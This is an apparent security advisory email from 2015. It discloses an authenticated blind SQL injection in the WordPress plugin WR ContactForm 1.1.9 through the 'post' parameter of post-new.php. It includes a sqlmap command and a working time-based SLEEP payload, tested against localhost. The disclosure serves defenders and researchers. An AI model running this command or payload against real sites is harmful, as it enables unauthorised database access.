Subject: Blind SQL injection in WR ContactForm 1.1.9
Date: Thu, 9 Jul 2015 00:24:33 +0200

Hello,

Plugin: WR ContactForm 1.1.9 https://wordpress.org/plugins/wr-contactform/

Authenticated users (with access to post-new.php) can execute arbitrary SQL commands.

1. SQL injection (WR_CF_Addon_Mailchimp::settings_panel())

Method: GET
Url: http://localhost/wp-admin/post-new.php?post_type=wr_cf_post_type&post=[sqli]
Vulnerable parameter: post

Example PHP callstack:

WR_CF_Addon_Mailchimp::settings_panel   [/wr-contactform/addons/mailchimp/addon-mailchimp.php:87]
wpdb::get_results   

Sqlmap verification:

sqlmap --cookie "..."  --dbms mysql -u "http://localhost/wp-admin/post-new.php?post_type=wr_cf_post_type&post=xxx" -p post

...
Parameter: post (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: post_type=wr_cf_post_type&post=xxx AND (SELECT * FROM (SELECT(SLEEP(5)))QWUF)
...

--
Regards,
Marcin Probola,